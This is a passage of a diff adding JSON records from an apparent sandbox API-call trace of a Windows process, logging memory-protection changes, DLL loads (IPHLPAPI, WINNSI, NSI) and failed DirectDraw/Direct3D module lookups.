"BaseAddress", + "value": "0x738ef000" + }, + { + "name": "ModuleName", + "value": "IPHLPAPI.DLL" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1011 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x77051ed8", + "parentcaller": "0x77051e61", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1012 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce22b8", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1013 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x77051ed8", + "parentcaller": "0x77051e91", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1014 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x77029d8b", + "parentcaller": "0x7703b4d0", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x738ed000" + }, + { + "name": "ModuleName", + "value": "IPHLPAPI.DLL" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1015 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x7704e71d", + "parentcaller": "0x7704e3d8", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000430" + } + ], + "repeated": 0, + "id": 1016 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x7704e725", + "parentcaller": "0x7704e3d8", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000042c" + } + ], + "repeated": 0, + "id": 1017 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x77040d40", + "parentcaller": "0x7702e4d3", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x738ed000" + }, + { + "name": "ModuleName", + "value": "IPHLPAPI.DLL" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1018 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x74269799", + "parentcaller": "0x7426950b", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "DDRAW.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1019 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x74269799", + "parentcaller": "0x7426950b", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D8.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 1020 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x74269799", + "parentcaller": "0x7426950b", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D9.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1021 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x74269951", + "parentcaller": "0x74268d22", + "category": "misc", + "api": "RtlDosPathNameToNtPathName_U", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "DosFileName", + "value": "C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL" + } + ], + "repeated": 0, + "id": 1022 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce22b8", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 1, + "id": 1023 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x74269a31", + "parentcaller": "0x74268d22", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000042c" + } + ], + "repeated": 0, + "id": 1024 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x74269a31", + "parentcaller": "0x74268d22", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\IPHLPAPI" + }, + { + "name": "DllBase", + "value": "0x738c0000" + } + ], + "repeated": 0, + "id": 1025 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "9440", + "caller": "0x03ce22b8", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 4, + "id": 1026 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x756e3170", + "parentcaller": "0x738cc589", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\IPHLPAPI" + }, + { + "name": "BaseAddress", + "value": "0x738c0000" + }, + { + "name": "InitRoutine", + "value": "0x738cc3b0" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 1027 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x734a1000" + }, + { + "name": "ModuleName", + "value": "wininet.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1028 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x734a1000" + }, + { + "name": "ModuleName", + "value": "wininet.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1029 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x770410cf", + "parentcaller": "0x7703f069", + "category": "process", + "api": "NtOpenSection", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d" + }, + { + "name": "ObjectAttributes", + "value": "WINNSI.DLL" + } + ], + "repeated": 0, + "id": 1030 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x7704216c", + "parentcaller": "0x77042076", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\winnsi.dll" + } + ], + "repeated": 0, + "id": 1031 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "8196", + "caller": "0x77041bae", + "parentcaller": "0x7703db51", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000007c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 1, + "id": 1032 + }, + { + "timestamp": "2025-03-07 22:33:24,844", + "thread_id": "6332", + "caller": "0x7704e68c", + "parentcaller": "0x7704e3d8", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000428" + }, + { + "name": "DesiredAccess", + "value": "0x00100021", + "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\winnsi.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 1033 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7704e6c9", + "parentcaller": "0x7704e3d8", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000430" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x00000428" + } + ], + "repeated": 0, + "id": 1034 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7704125c", + "parentcaller": "0x770413c7", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000430" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74630000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00008000" + }, + { + "name": "Win32Protect", + "value": "0x00000080", + "pretty_value": "PAGE_EXECUTE_WRITECOPY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1035 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77051ed8", + "parentcaller": "0x77051e61", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1036 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77051ed8", + "parentcaller": "0x77051e91", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1037 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77029d8b", + "parentcaller": "0x7703b4d0", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74635000" + }, + { + "name": "ModuleName", + "value": "WINNSI.DLL" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1038 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x770410cf", + "parentcaller": "0x7703f069", + "category": "process", + "api": "NtOpenSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000434" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d" + }, + { + "name": "ObjectAttributes", + "value": "NSI.dll" + } + ], + "repeated": 0, + "id": 1039 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7704125c", + "parentcaller": "0x770413c7", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000434" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76040000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00007000" + }, + { + "name": "Win32Protect", + "value": "0x00000080", + "pretty_value": "PAGE_EXECUTE_WRITECOPY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1040 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77051ed8", + "parentcaller": "0x77051e61", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1041 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77051ed8", + "parentcaller": "0x77051e91", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1042 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77029d8b", + "parentcaller": "0x7703b4d0", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76044000" + }, + { + "name": "ModuleName", + "value": "NSI.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1043 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7703f0e9", + "parentcaller": "0x77042368", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000434" + } + ], + "repeated": 0, + "id": 1044 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7704e71d", + "parentcaller": "0x7704e3d8", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000430" + } + ], + "repeated": 0, + "id": 1045 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7704e725", + "parentcaller": "0x7704e3d8", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000428" + } + ], + "repeated": 0, + "id": 1046 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77040d40", + "parentcaller": "0x7702e4d3", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76044000" + }, + { + "name": "ModuleName", + "value": "NSI.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1047 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77040d40", + "parentcaller": "0x7702e4d3", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74635000" + }, + { + "name": "ModuleName", + "value": "WINNSI.DLL" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1048 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x74269799", + "parentcaller": "0x7426950b", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "DDRAW.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1049 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x74269799", + "parentcaller": "0x7426950b", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D8.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 1050 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x74269799", + "parentcaller": "0x7426950b", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D9.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1051 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x74269951", + "parentcaller": "0x74268d22", + "category": "misc", + "api": "RtlDosPathNameToNtPathName_U", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "DosFileName", + "value": "C:\\Windows\\System32\\NSI.dll" + } + ], + "repeated": 0, + "id": 1052 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x74269990", + "parentcaller": "0x74268d22", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000428" + }, + { + "name": "DesiredAccess", + "value": "0x00020000", + "pretty_value": "READ_CONTROL" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\nsi.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 1053 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x74269a31", + "parentcaller": "0x74268d22", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000428" + } + ], + "repeated": 0, + "id": 1054 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x74269a31", + "parentcaller": "0x74268d22", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\System32\\NSI" + }, + { + "name": "DllBase", + "value": "0x76040000" + } + ], + "repeated": 0, + "id": 1055 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x74269799", + "parentcaller": "0x7426950b", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "DDRAW.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1056 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x74269799", + "parentcaller": "0x7426950b", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D8.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 1057 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x74269799", + "parentcaller": "0x7426950b", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D9.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1058 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x74269951", + "parentcaller": "0x74268d22", + "category": "misc", + "api": "RtlDosPathNameToNtPathName_U", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "DosFileName", + "value": "C:\\Windows\\SYSTEM32\\WINNSI.DLL" + } + ], + "repeated": 0, + "id": 1059 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x74269990", + "parentcaller": "0x74268d22", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000428" + }, + { + "name": "DesiredAccess", + "value": "0x00020000", + "pretty_value": "READ_CONTROL" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\winnsi.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 1060 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x74269a31", + "parentcaller": "0x74268d22", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000428" + } + ], + "repeated": 0, + "id": 1061 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x74269a31", + "parentcaller": "0x74268d22", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\WINNSI" + }, + { + "name": "DllBase", + "value": "0x74630000" + } + ], + "repeated": 0, + "id": 1062 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7703dda2", + "parentcaller": "0x770418a3", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\nsi" + }, + { + "name": "BaseAddress", + "value": "0x76040000" + }, + { + "name": "InitRoutine", + "value": "0x76041e60" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 1063 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7703dda2", + "parentcaller": "0x770418a3", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\winnsi" + }, + { + "name": "BaseAddress", + "value": "0x74630000" + }, + { + "name": "InitRoutine", + "value": "0x74632220" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 1064 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x738ef000" + }, + { + "name": "ModuleName", + "value": "IPHLPAPI.DLL" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1065 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7703ff34", + "parentcaller": 